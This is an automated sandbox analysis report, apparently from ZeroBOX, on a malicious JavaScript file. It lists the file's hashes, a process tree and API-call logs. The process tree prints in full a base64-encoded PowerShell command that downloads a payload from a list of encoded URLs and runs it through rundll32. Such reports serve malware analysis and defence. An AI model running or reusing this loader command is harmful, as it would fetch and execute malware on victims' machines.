Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	May 23, 2023, 9:37 a.m.	May 23, 2023, 9:39 a.m.

Size	119.0KB
Type	ASCII text, with very long lines, with CRLF line terminators
MD5	`b93770e7d4d1a2bc3d3121fc7d1ac0e4`
SHA256	`37a7500547fb570806167d2997d4defa8f05d31b26ff0f6da7fe0002a44221ba`
CRC32	`9A7BE834`
ssdeep	`3072:kgAXm24EhqOwD+LpSUmfqycgkFMjFiUu+Z+L:kFVqOwDtkeRIL`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Bkeeki.js
2552
- wscript.exe "C:\Windows\System32\wscript.exe" "C:\ProgramData\aeolus.js" OxeyesSpondaic quadragesima feculence TouristshipFeldspathization
  2752
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABIAG8AbABpAHMAdABBAGMAeQBsAGEAdABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABRAEEATwBRAEEAdQBBAEQASQBBAE4AQQBBADEAQQBDADQAQQBNAGcAQQB3AEEARABrAEEATABnAEEAeQBBAEQAQQBBAE8AUQBBAD0ARwBRAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE4AdwBBAHUAQQBEAEUAQQBOAGcAQQAxAEEAQwA0AEEATQBRAEEANQBBAEQAawBBAEwAZwBBAHgAQQBEAGMAQQBNAHcAQQA9ACIAOwAkAG4AaQBiAG8AbgBnACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgBBAEEAMwBBAEMANABBAE4AUQBBAHkAQQBDADQAQQBOAGcAQQA0AEEAQwA0AEEATQBRAEEAdwBBAEQAZwBBAFIARQBLAGwAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABVAEEATQBRAEEAdQBBAEQARQBBAE0AZwBBADMAQQBDADQAQQBNAFEAQQAzAEEARABnAEEATABnAEEAeABBAEQASQBBAE0AdwBBAD0AUgBFAEsAbABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFADAAQQBiAHcAQgBwAEEASABJAEEAWQBRAEIAcABBAEYAQQBBAGMAZwBCAGwAQQBIAEEAQQBkAFEAQgB3AEEARwBFAEEAYgBBAEEAdQBBAEcANABBAGQAUQBBAD0AIgA7ACQAWQBhAGsAbwBuAGEAbgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAGsAQQBHAGsAQQBjAHcAQgB6AEEASABVAEEAWQBRAEIAawBBAEcARQBBAFkAZwBCAHMAQQBIAGsAQQBMAGcAQgBwAEEARwA0AEEAYQB3AEEAPQB5AHQAZQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEkAQQBNAHcAQQB1AEEARABFAEEATgBBAEEAMABBAEMANABBAE4AQQBBAHcAQQBDADQAQQBOAGcAQQB3AEEAQQA9AD0AIgA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEANQA7ACQAYQBzAGUAYwByAGUAdABvAHIAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAUQBBAFkAUQBCAHMAQQBHAHcAQQBiAHcAQgAzAEEARgBJAEEAWQBRAEIAawBBAEcAawBBAGIAdwBCAHMAQQBHAGsAQQBkAEEAQgBsAEEAQwA0AEEAWgBRAEIANABBAEgAQQBBAGIAdwBCAHoAQQBHAFUAQQBaAEEAQQA9ACIAOwAkAGQAbwBlAGwAaQBuAGcAQQByAGMAaABvAHYAZQByAHMAZQBlAHIAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEQAQQBHADgAQQBjAHcAQgB0AEEARwA4AEEAWQB3AEIAeQBBAEcARQBBAGQAQQBBAHUAQQBIAFkAQQBhAFEAQgBoAEEARwBvAEEAWgBRAEIAegBBAEEAPQA9ACIAOwAkAGgAaQBiAGkAcwBjAHUAcwBlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAGcAQQBNAFEAQQB1AEEARABFAEEATgBnAEEAdwBBAEMANABBAE8AUQBBAHkAQQBDADQAQQBNAFEAQQA1AEEARABJAEEAYQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHIAQQBHAEUAQQBhAFEAQgAyAEEARwBFAEEAYgBBAEIANQBBAEcARQBBAEwAZwBCAHAAQQBHADQAQQBhAHcAQQA9AGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBCAEEASABNAEEAWgBRAEIAcwBBAEcAdwBBAFkAUQBCADAAQQBHAFUAQQBSAFEAQgB0AEEASABBAEEAYQBBAEIAbABBAEcAMABBAFoAUQBCAHkAQQBHAEUAQQBiAEEAQgB1AEEARwBVAEEAYwB3AEIAegBBAEMANABBAFkAdwBCAHYAQQBIAFUAQQBiAGcAQgAwAEEASABJAEEAZQBRAEEAPQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AZwBBADAAQQBDADQAQQBNAFEAQQA0AEEARABNAEEATABnAEEAeQBBAEQATQBBAE0AQQBBAHUAQQBEAGMAQQBOAHcAQQA9ACIAOwAkAGQAaQBvAHMAYwBvAHIAZQBpAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGMAQQBOAGcAQQB1AEEARABFAEEATQBnAEEAMABBAEMANABBAE0AUQBBADUAQQBEAGcAQQBMAGcAQQB5AEEARABFAEEATQB3AEEAdgBBAEUAWQBBAGMAdwBBADQAQQBGAEEAQQBlAFEAQQB2AEEARwB3AEEAUgBRAEIARgBBAEUAVQBBAFIAZwBBADQAQQBBAD0APQBiAHoAVQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBPAFEAQQB1AEEARABFAEEATgB3AEEAeQBBAEMANABBAE4AQQBBADEAQQBDADQAQQBOAHcAQQA1AEEAQwA4AEEAVQBBAEIAcwBBAEUAdwBBAE4AQQBCAHQAQQBGAFUAQQBMAHcAQgBuAEEARQBFAEEATQBBAEIAVQBBAEcAOABBAFMAQQBBAD0AYgB6AFUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE0AZwBBADAAQQBDADQAQQBNAFEAQQA1AEEARABnAEEATABnAEEAeQBBAEQARQBBAE0AZwBBAHYAQQBIAE0AQQBNAEEAQgBCAEEAQwA4AEEAYwB3AEIANgBBAEUAZwBBAFUAdwBCAEkAQQBEAE0AQQBSAHcAQgBFAEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQATABlAHAAcgBvAHQAaQBjAEYAaQBkAGQAbABpAGUAcwAgAGkAbgAgACQAZABpAG8AcwBjAG8AcgBlAGkAbgAgAC0AcwBwAGwAaQB0ACAAIgBiAHoAVQAiACkAIAB7ACQAQwBhAHMAcwBvAGMAawBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQBnAEEANQBBAEMANABBAE0AZwBBAHkAQQBEAFkAQQBMAGcAQQB5AEEARABJAEEATQBBAEEAdQBBAEQARQBBAE8AUQBBADQAQQBBAD0APQBXAGEAegBRAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAVABBAEcARQBBAGIAZwBCAGgAQQBIAFEAQQBiAHcAQgB5AEEARwBrAEEAYwBnAEIAcABBAEgAVQBBAGIAUQBCAHoAQQBGAE0AQQBkAEEAQgB5AEEARwBFAEEAWQB3AEIAagBBAEcAZwBBAGEAUQBCAHUAQQBHADgAQQBMAGcAQgAyAEEARwBrAEEAYgBBAEIAcwBBAEcARQBBAGMAdwBBAD0AVwBhAHoAUQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADAAQQBEAEUAQQBMAGcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAFEAQQAwAEEARABnAEEAIgA7ACQAUABlAGMAaABlAGQATABhAGQAeQBoAG8AbwBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBwAEEARwA0AEEAZABBAEIAbABBAEgASQBBAFkAdwBCAHAAQQBIAEEAQQBhAFEAQgBsAEEARwA0AEEAZABBAEEAdQBBAEgAQQBBAGEAUQBCAGoAQQBIAFEAQQBkAFEAQgB5AEEARwBVAEEAYwB3AEEAPQBDAHIARgBsAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIASABBAEcAawBBAFkAUQBCAHQAQQBHAEkAQQBaAFEAQgAxAEEASABnAEEATABnAEIAcQBBAEgAQQBBACIAOwAkAHUAbgBzAGUAZQBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBrAEEARwBFAEEAYwBnAEIAbABBAEcARQBBAGIAQQBCAHMAQQBGAFUAQQBiAGcAQgB3AEEARwBFAEEAYwBnAEIAcgBBAEcAVQBBAFoAQQBBAHUAQQBHAFEAQQBaAFEAQgB1AEEASABRAEEAWQBRAEIAcwBBAEEAPQA9AGUAQQA9AHUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQBRAEEANQBBAEMANABBAE0AZwBBADEAQQBEAFEAQQBMAGcAQQA0AEEARABRAEEATABnAEEAeABBAEQAUQBBAE4AdwBBAD0AZQBBAD0AdQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAEUAQQBjAFEAQgAxAEEARwBFAEEAYwBnAEIAcABBAEgATQBBAGQAQQBCAHoAQQBDADQAQQBZAHcAQgBoAEEARwBZAEEAWgBRAEEAPQAiADsAdAByAHkAIAB7ACQAQQBuAGkAcwBpAGwAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAE0AQQBaAFEAQgB0AEEARwBrAEEAYwBBAEIAeQBBAEcAOABBAGIAZwBCAGwAQQBHADQAQQBaAFEAQgB6AEEASABNAEEAVQBBAEIAbwBBAEcAOABBAGIAZwBCAHYAQQBIAE0AQQBMAGcAQgB1AEEASABrAEEAWQB3AEEAPQBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAZwBBAEwAZwBBAHgAQQBEAEUAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAdwBBAEMANABBAE0AUQBBADMAQQBEAFkAQQAiADsAJABSAGUAdAByAG8AbQBpAGcAcgBhAHQAaQBvAG4AUwBhAGwAdABpAHIAZQB3AGkAcwBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABVAEEAYgBnAEIAdgBBAEcASQBBAGIAQQBCAHAAQQBHAGMAQQBZAFEAQgAwAEEARwBVAEEAWgBBAEIATgBBAEcAOABBAGMAZwBCADAAQQBHAEUAQQBiAEEAQgB6AEEAQwA0AEEAYwB3AEIAbwBBAEcAOABBAGQAdwBBAD0AIgA7ACQARQBsAGUAYwB0AHIAbwBsAHkAegBpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AUQBBADQAQQBDADQAQQBNAFEAQQAzAEEARABZAEEATABnAEEAeABBAEQATQBBAE4AZwBBAHUAQQBEAEkAQQBNAHcAQQA0AEEAQQA9AD0AIgA7ACQAbgBvAG4AbQBpAGwAaQB0AGEAbgB0AGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABMAGUAcAByAG8AdABpAGMARgBpAGQAZABsAGkAZQBzACkAKQA7AHcAZwBlAHQAIAAkAG4AbwBuAG0AaQBsAGkAdABhAG4AdABsAHkAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwASQBkAGUAbwBwAHIAYQB4AGkAcwB0AC4AUgB1AG0AaQBuAGEAdABpAHYAZQA7ACQARABhAG0AYQBzAGsAaQBuAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFUAQQBOAEEAQQB1AEEARABFAEEATwBRAEEAeABBAEMANABBAE0AZwBBADAAQQBEAEUAQQBMAGcAQQA1AEEARABjAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwASQBkAGUAbwBwAHIAYQB4AGkAcwB0AC4AUgB1AG0AaQBuAGEAdABpAHYAZQApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIANQAxADcAMgA3ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEARQBrAEEAWgBBAEIAbABBAEcAOABBAGMAQQBCAHkAQQBHAEUAQQBlAEEAQgBwAEEASABNAEEAZABBAEEAdQBBAEYASQBBAGQAUQBCAHQAQQBHAGsAQQBiAGcAQgBoAEEASABRAEEAYQBRAEIAMgBBAEcAVQBBAEwAQQBCADIAQQBHAGsAQQBjAEEAQgB6AEEARABzAEEAYwB3AEIAcwBBAEcARQBBAFkAdwBCAHIAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEAIgA7ACQAcwB1AG0AbQBpAG4AZwBzAFAAbwBsAGwAZQByAGEAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAegBBAEgAUQBBAGQAUQBCAGgAQQBIAEkAQQBkAEEAQgBwAEEARwBFAEEAUQB3AEIAaABBAEgASQBBAFoAQQBCADEAQQBHAFUAQQBiAEEAQgBwAEEASABNAEEATABnAEIAMwBBAEcAOABBAGMAZwBCAHIAQQBBAD0APQBKAE4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgB3AEEARwA4AEEAYQBRAEIAcgBBAEcAawBBAGIAQQBCAHYAQQBHAEkAQQBiAEEAQgBoAEEASABNAEEAZABBAEEAdQBBAEcATQBBAGIAdwBCADEAQQBIAEkAQQBjAHcAQgBsAEEASABNAEEAIgA7ACQAdABvAGcAbABlAHMAcwBDAG8AcgBuAGMAcgBhAGsAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgATQBBAGQAQQBCAGgAQQBIAEEAQQBhAEEAQgA1AEEARwB3AEEAYQBRAEIAdQBBAEcAVQBBAFYAQQBCAG8AQQBHAGsAQQBiAFEAQgBpAEEARwB3AEEAWgBRAEIAdABBAEcARQBBAGIAZwBBAHUAQQBHAE0AQQBiAHcAQgB0AEEAQQA9AD0AIgA7ACQAZwBsAHUAZQBtAGEAbgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAUQBBAEgASQBBAFoAUQBCADAAQQBIAEkAQQBZAFEAQgB1AEEASABNAEEAWQBRAEIAagBBAEgAUQBBAGEAUQBCAHYAQQBHADQAQQBTAGcAQgBoAEEASABJAEEAWgB3AEIAdgBBAEcAOABBAGIAZwBCAHoAQQBDADQAQQBZAHcAQgB2AEEARwA0AEEAZABBAEIAeQBBAEcARQBBAFkAdwBCADAAQQBHADgAQQBjAGcAQgB6AEEAQQA9AD0AZAB0AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AdwBBADIAQQBDADQAQQBNAFEAQQAxAEEARABJAEEATABnAEEAeABBAEQAWQBBAE0AdwBBAHUAQQBEAEkAQQBNAGcAQQA0AEEAQQA9AD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAJABTAHUAcgBhAGQAZABpAHQAaQBvAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFQAQQBHAGcAQQBhAFEAQgB1AEEASABRAEEAYgB3AEIAcABBAEgATQBBAGQAQQBCAEoAQQBIAE0AQQBiAHcAQgB0AEEARwBVAEEAYwBnAEIAdgBBAEcAMABBAGIAdwBCAHkAQQBIAEEAQQBhAEEAQgBwAEEASABNAEEAYgBRAEEAdQBBAEcATQBBAGIAdwBCAHQAQQBHADAAQQBkAFEAQgB1AEEARwBrAEEAZABBAEIANQBBAEEAPQA9AFcAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgB3AEEAdwBBAEMANABBAE0AZwBBADEAQQBEAFUAQQBMAGcAQQB4AEEARABRAEEATgBnAEEAdQBBAEQARQBBAE8AUQBBADIAQQBBAD0APQBXAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQATQBBAE4AQQBBAHUAQQBEAGsAQQBNAEEAQQB1AEEARABZAEEATgBnAEEAdQBBAEQAZwBBAE8AUQBBAD0AVwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHQAQQBHAEUAQQBiAGcAQgAwAEEARwBrAEEAYwB3AEIAcABBAEcARQBBAEwAZwBCADEAQQBIAE0AQQAiADsAJABpAGIAdQBwAHIAbwBmAGUAbgBEAGUAcgBlAGcAdQBsAGEAdABpAG8AbgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBjAEEAZABRAEIAaQBBAEcAVQBBAGMAZwBCAHUAQQBHAEUAQQBiAGcAQgBqAEEARwBVAEEATABnAEIAagBBAEcARQBBAFoAZwBCAGwAQQBBAD0APQBGAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAQQBBAGIAdwBCAHMAQQBIAGsAQQBjAEEAQgBvAEEARwA4AEEAYgBnAEIAcABBAEgATQBBAGIAUQBCAEMAQQBHAHcAQQBaAFEAQgB3AEEARwBnAEEAWQBRAEIAeQBBAEcAOABBAGMAQQBCAG8AQQBIAFEAQQBhAEEAQgBoAEEARwB3AEEAYgBRAEIAcABBAEcARQBBAEwAZwBCAG8AQQBHADgAQQBjAGcAQgB6AEEARwBVAEEARgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEoAQQBHADQAQQBjAHcAQgAwAEEARwBrAEEAZABBAEIAMQBBAEgAUQBBAFoAUQBCAHkAQQBIAE0AQQBVAHcAQgB0AEEARwA4AEEAYQB3AEIAbABBAEgATQBBAEwAZwBCAGkAQQBHAEUAQQBiAGcAQgBrAEEAQQA9AD0AIgA7AH0AfQAkAFYAaQB0AHQAbABpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMgBBAEQAQQBBAEwAZwBBAHkAQQBEAEUAQQBOAHcAQQB1AEEARABZAEEATwBRAEEAdQBBAEQASQBBAE0AdwBBAHgAQQBBAD0APQBvAG4AYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQAwAEEAWgBRAEIAegBBAEcAMABBAFoAUQBCAHkAQQBHAGsAQQBjAHcAQgBsAEEAQwA0AEEAWgBnAEIAaABBAEcAawBBAGIAQQBBAD0AbwBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE8AUQBBAHUAQQBEAEUAQQBOAGcAQQA1AEEAQwA0AEEATgBnAEEANQBBAEMANABBAE0AZwBBAHoAQQBEAEkAQQBvAG4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATQBnAEEAdQBBAEQARQBBAE4AUQBBADAAQQBDADQAQQBNAFEAQQB4AEEARABZAEEATABnAEEAeABBAEQAYwBBAE8AQQBBAD0AIgA7ACQAbQBpAGMAcgBvAHAAaABhAGcAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AZwBBAHcAQQBDADQAQQBOAGcAQQB5AEEAQwA0AEEATQBRAEEAMgBBAEQAQQBBAEwAZwBBAHkAQQBEAEkAQQBOAGcAQQA9AHEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBZAEEAWQBRAEIAdABBAEcAawBBAGIAQQBCAHAAQQBHAEUAQQBjAGcAQgBwAEEASABRAEEAZQBRAEEAdQBBAEcAUQBBAGIAdwBCADMAQQBHADQAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAPQAiADsA"
    2872

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW May 23, 2023, 9:37 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 23, 2023, 9:37 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 23, 2023, 9:37 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 23, 2023, 9:37 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 23, 2023, 9:37 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 23, 2023, 9:37 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 23, 2023, 9:37 a.m.			0	0

Uses Windows APIs to generate a cryptographic key (42 events)

Time & API	Arguments	Status	Return
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052df68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052e4e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052e4e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052e4e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052e6e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052e6e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052e6e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052e6e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052e6e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052e6e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052df28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052df28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052df28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052e4e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052e4e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052e4e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052db28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052e4e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052e4e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052e4e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052e4e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052e4e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052e4e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052e4e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052e868 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052e868 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052e868 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052e868 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052e868 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052e868 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052e868 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052e868 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052e868 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052e868 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
